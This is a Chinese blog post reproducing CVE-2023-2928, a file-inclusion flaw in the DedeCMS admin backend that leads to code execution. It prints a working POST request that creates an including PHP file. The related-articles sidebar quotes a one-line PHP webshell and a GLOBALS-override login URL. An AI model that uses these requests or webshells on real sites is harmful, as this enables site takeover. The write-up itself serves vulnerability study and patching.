CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析

最新推荐文章于 2024-05-01 12:00:00 发布
最新推荐文章于 2024-05-01 12:00:00 发布
阅读量1k 收藏 2
点赞数 7
分类专栏: PHP代码审计 文章标签: 安全 php web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/137467939
版权

DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。

在 DedeCMS 5.7.106 及之前的版本中发现一个漏洞。它已被宣布为关键。受此漏洞影响的是未知功能的文件uploads/dede/article_allowurl_edit.php。对参数 allurls 的操作会导致代码注入。攻击可以远程发起。该漏洞已向公众披露并可能被使用。此漏洞的关联标识符为 VDB-230083。

漏洞复现

访问article_allowurl_edit.php页面 保存超链接

访问file_manage_control.php 利用文件包含构造1.php

POST /dede/file_manage_control.php HTTP/1.1

fmdo=edit&backurl=&token=&activepath=&filename=1.php&str=<?php Include_once("./data/admin/allowurl.txt"); ?>&B1=++%E4%BF%9D+%E5%AD%98++

访问1.php

漏洞分析

article_allowurl_edit.php

可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效

file_manage_control.php

这里就不分析后端了 我们之前看这个页面的功能

file_manage_control.php 页面为用户提供了网站文件管理的功能,

尝试在php中或txt中添加php执行代码结果被检测了

这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。

创建文件1.php

其内容为<?php Include_once("./data/admin/allowurl.txt"); ?>

之后访问1.php 即可执行我们想要的代码

昵称还在想呢
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3552
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 858
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
dedecms远程文件包含漏洞
weixin_43778463的博客
11-06 1059
dedecms远程文件包含漏洞
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
wangluoanquan111的博客
05-01 620
DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 413
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
另类dedecms后台拿shell
weixin_30412013的博客
05-15 494
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 转载于:https://www....
mysql5.5.57 漏洞_DedeCMS V5.7 SP2后台代码执行漏洞webshell
weixin_28953369的博客
02-18 408
漏洞详情织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。dede/tpl.php 中第251行到281行csrf_check();if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)){ShowMsg('文件名不合法,不允许进行操作!', '-1');exit();}require_on...
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 1064
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
【渗透实战】日常挖洞第一期_社工某企业dedeCMSshell
q848581720的博客
10-22 787
/禁止转载 原作者QQ:848581720/ ■重要细节全部打码 ■部分细节对外开放 ●漏洞已提交,无影响厂商忽略 注:日常挖洞系列基本上是记录平常遇到的非常普通的漏洞,毫无看点,仅仅记录挖洞的经验 ———————————————— 0X001收集信息 因为这是某个大型服务器集成的共享宽带型虚拟主机,所以我就不在这说是什么服务器了, 也不告诉大家域名是多少,只是让大家互相学习,交流经验。 首先在站...
dedecms最新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4188
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5197
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1515
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
【转】dedecms最新版本修改任意管理员漏洞 附getshell exp
ITfinder
06-30 529
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2242
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
记一次学习用Dedecms模板执行漏洞拿站的过程-黑客博客
weixin_34129145的博客
12-27 308
这几天在拿一个站的shell,经过前期的信息收集,发现网站用的是Dedecms,把常用的几个以前Dedecms出的漏洞测试了一遍,都没成功。在翻收集的漏洞资料时看到了“Dedecms<=V5.7 Final模板执行漏洞”这个漏洞,记得这个漏洞是今年夏天出的,由于漏洞利用过程比较麻烦,当时没耐心测试就放在电脑里没动。一看漏洞居然不会利用,好在在某论坛找到了帖子,看了几遍总算会了,照葫芦画瓢,最...
织梦dedesql.class.php文件漏洞解决方法
塔夏时光的博客
04-02 5924
阿里云后台提示织梦dedesql.class.php文件变量覆盖漏洞会导致SQL注入,可被攻击者构造恶意SQL语句,重置管理员密码,写入webshell等,进而获取服务器权限。下面告诉大家怎么修复这个漏洞:首先说一下dedecms安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第106行:万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们...
cve-2023-44313漏洞
02-03
CVE-2023-44313是一个安全漏洞,其涉及到某个特定软件或系统的代码中存在的问题。该漏洞可能导致攻击者利用该软件或系统的弱点,来执行恶意代码或获取未授权的访问权限。 对于CVE-2023-44313漏洞,它可能具有多种不同的影响。例如,攻击者可能能够通过利用该漏洞,绕过身份验证机制并访问系统中的敏感数据。此外,他们还可以执行未经授权的命令,使系统陷入不稳定状态,甚至导致系统崩溃。 为了解决CVE-2023-44313漏洞,软件或系统的开发者通常会发布一个安全更新或补丁程序。这个补丁会修复软件或系统中存在的漏洞,加强安全性并防止攻击者利用该漏洞。因此,作为用户,我们应该及时安装这些更新或补丁,以确保自己的系统免受该漏洞的影响。 此外,我们还可以采取其他一些措施来防止CVE-2023-44313漏洞的利用。例如,我们应该确保使用的软件和系统是最新版本,因为较旧的版本可能会存在已知的漏洞。此外,保持杀毒软件和防火墙的最新更新也是很重要的,因为它们可以帮助我们检测和阻止潜在的恶意活动。 总之,CVE-2023-44313漏洞是一个需要引起关注并及时处理的安全漏洞。通过安装最新的安全更新和补丁,以及保持软件和系统的最新版本,我们可以显著降低受到该漏洞攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值